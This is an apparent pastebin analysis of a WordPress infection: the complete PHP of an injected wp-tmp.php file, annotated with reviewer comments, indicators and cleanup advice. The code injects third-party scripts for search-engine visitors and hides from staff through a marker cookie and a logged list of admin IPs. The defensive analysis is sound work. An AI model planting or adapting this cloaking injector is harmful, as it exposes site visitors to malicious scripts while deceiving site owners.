baardove

wordpress malware - Dolohen WordPress Malware

Nov 11th, 2019
  1. wordpress malware...
  2.  
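  3. wp-insert/wp-feed.php --> contained my home IP address ?!?! (Explained by the wp-tmp.php code below: when a logged-in user who has the edit_others_pages capability loads the site, the code appends that request's REMOTE_ADDR to wp-includes/wp-feed.php, and it later withholds the injected scripts from every address on that list.)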
  4.  
  5. wp-insert/wp-tmp.php
  6.  
  // Start of the injected file: both calls below switch off PHP error display and reporting,
  // so any fault in this code stays out of rendered pages.
  // NOTE(review): the listing does not show what includes wp-tmp.php; during cleanup, find and
  // remove the include/require that loads it, not only this file.
  7. ini_set('display_errors', 0);
  8. error_reporting(0);
  // Hard-coded 32-hex-character value. Nothing in the visible listing reads it, so its purpose
  // cannot be determined from this paste. NOTE(review): it may differ between infected sites;
  // confirm before relying on it as a search signature.
  9. $wp_auth_key='8a8ddc1122d1170c4a6a2d3e60814900';
  10.  
  11.  
  12.  
  13.  
  14. if ( ! function_exists( 'slider_option' ) ) {
  15.  
  // slider_option($content): callback registered on the 'the_content' filter further down
  // (listing line 124). On single-post views it appends two third-party <script> tags to the
  // post body and returns the result; on any other view it returns $content unchanged.
  // The name suggests a slider plugin, but the body contains no slider logic.
  // Indicators visible here: dolohen.com/apu.php?zoneid=2222419 and pushlum.com/ntfc.php?p=2222423.
  16. function slider_option($content){
  17. if(is_single())
  18. {
  19.  
  20.  
  21.  
  22.  
  // $con is assigned a string containing only a line break and is never used afterwards.
  23. $con = '
  24. ';
  25.  
  // $con2 holds the injected markup. Both URLs are protocol-relative, so they load over
  // whichever scheme the page uses. data-cfasync="false" is the attribute Cloudflare Rocket
  // Loader honours to leave a script untouched.
  // Mitigation note: a Content-Security-Policy script-src that does not allow these hosts
  // stops the browser from loading them even while the site is still infected.
  26. $con2 = '
  27.  
  28. <script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2222419"></script>
  29. <script src="//pushlum.com/ntfc.php?p=2222423" data-cfasync="false" async></script>
  30. ';
  31.  
  // Injection point: the markup is appended after the genuine post content.
  32. $content=$content.$con2;
  33. }
  34. return $content;
  35. }
  36.  
  // slider_option_footer(): callback registered on the 'wp_footer' action further down
  // (listing line 125). It is the counterpart of slider_option() for every view that is NOT a
  // single post: it echoes the same two third-party <script> tags directly into the footer.
  // Taken together, the two callbacks cover each page type once.
  37. function slider_option_footer(){
  38. if(!is_single())
  39. {
  40.  
  41.  
  42.  
  43.  
  // Same markup and same indicators as in slider_option(): dolohen.com (zoneid=2222419) and
  // pushlum.com (p=2222423).
  44. $con2 = '
  45.  
  46. <script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2222419"></script>
  47. <script src="//pushlum.com/ntfc.php?p=2222423" data-cfasync="false" async></script>
  48. ';
  49.  
  // Written straight to the response; it does not pass through any content filter.
  50. echo $con2;
  51. }
  52. }
  53.  
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  // setting_my_first_cookie(): sets the cookie 'wordpress_cf_adm_use_adm' to 1 with a lifetime
  // of 3600*24*1000 seconds (1000 days) for the site's cookie path and domain.
  // The cookie is a marker, not an authentication token: the gate near the end of the listing
  // (line 117) skips the script injection for any browser that presents it. The name merely
  // resembles WordPress's own 'wordpress_' cookies.
  // Detection note: this cookie name in a browser or in proxy logs is an indicator that the
  // browser was once logged in to a site running this code.
  61. function setting_my_first_cookie() {
  62. setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  63. }
  64.  
  65.  
  // Any logged-in user, whatever the role, gets the marker cookie: the setter is hooked to
  // 'init' with priority 1. Once set, the cookie keeps the injection hidden from that browser
  // even after the user logs out.
  66. if(is_user_logged_in())
  67. {
  68. add_action( 'init', 'setting_my_first_cookie',1 );
  69. }
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76.  
  // Staff IP logging. For a user holding the 'edit_others_pages' capability (editors and
  // administrators in WordPress's default roles), the request's REMOTE_ADDR is appended to
  // wp-includes/wp-feed.php unless it is already listed there.
  // Despite the .php extension, the file is used here purely as a newline-separated list of
  // addresses. This is why a site owner finds their own home IP inside it.
  // Detection note: as far as this reviewer knows, WordPress core does not ship a
  // wp-includes/wp-feed.php; verify against the official checksums for the installed version.
  // The file itself is a record of privileged users' addresses stored under the web root.
  77. if( current_user_can('edit_others_pages'))
  78. {
  79.  
  // Load the existing list; '@' suppresses any read warning. $ip is assigned only when the
  // file already exists.
  80. if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
  81. {
  82. $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
  83. }
  84.  
  // Case-insensitive substring search for the current address in the list.
  85. if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
  86. {
  // Append the address followed by a line break, then rewrite the whole file; '@' again
  // suppresses warnings, so a failed write is silent.
  87. $ip.=$_SERVER['REMOTE_ADDR'].'
  88. ';
  89. @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
  90.  
  91.  
  92. }
  93.  
  94.  
  95.  
  96. }
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  // Referrer check. The request's Referer header is compared against a list of search-engine
  // and ad-network substrings. On a match, the visitor is flagged through the $sevisitor
  // variable and a 'sevisitor' cookie lasting 120 seconds, which carries the flag across the
  // next few page loads.
  // Visits with no matching referrer, such as typing the URL or using a bookmark, are not flagged.
  // Detection note: a 'sevisitor' cookie set by a WordPress site is an indicator of this code.
  103. $ref = $_SERVER['HTTP_REFERER'];
  104. $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
  105. foreach ($SE as $source) {
  // Plain case-sensitive substring match anywhere in the Referer value.
  106. if (strpos($ref,$source)!==false) {
  107. setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
  108. $sevisitor=true;
  109. }
  110. }
  111.  
  112.  
  113.  
  114.  
  115.  
  116.  
  // Cloaking gate. The two injection callbacks are registered only when ALL of these hold:
  //   - the browser does not send the 'wordpress_cf_adm_use_adm' marker cookie,
  //   - the visitor is not logged in,
  //   - the request's REMOTE_ADDR does not appear in wp-includes/wp-feed.php,
  //   - the visitor was flagged as arriving from a search engine (variable or 'sevisitor' cookie).
  // Consequence for responders: site staff browsing normally see a clean page, so the absence
  // of the scripts in an owner's own browser is not evidence that the site is clean.
  // Check the files on disk (wp-tmp.php, wp-feed.php, whatever includes them) rather than
  // relying on what a staff browser renders.
  117. if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
  118. {
  // Re-read the logged staff addresses; '@' hides the warning if the file is missing.
  119. $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
  120. if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
  121. {
  122. if($sevisitor==true || isset($_COOKIE['sevisitor']))
  123. {
  // Hooks that actually deliver the third-party scripts: post bodies via 'the_content',
  // all other pages via 'wp_footer'.
  124. add_filter('the_content','slider_option');
  125. add_action('wp_footer','slider_option_footer');
  126. }
  127.  
  128. }
  129.  
  130. }
  131.  
  132.  
  133.  
  134.  
  135.  
  136. }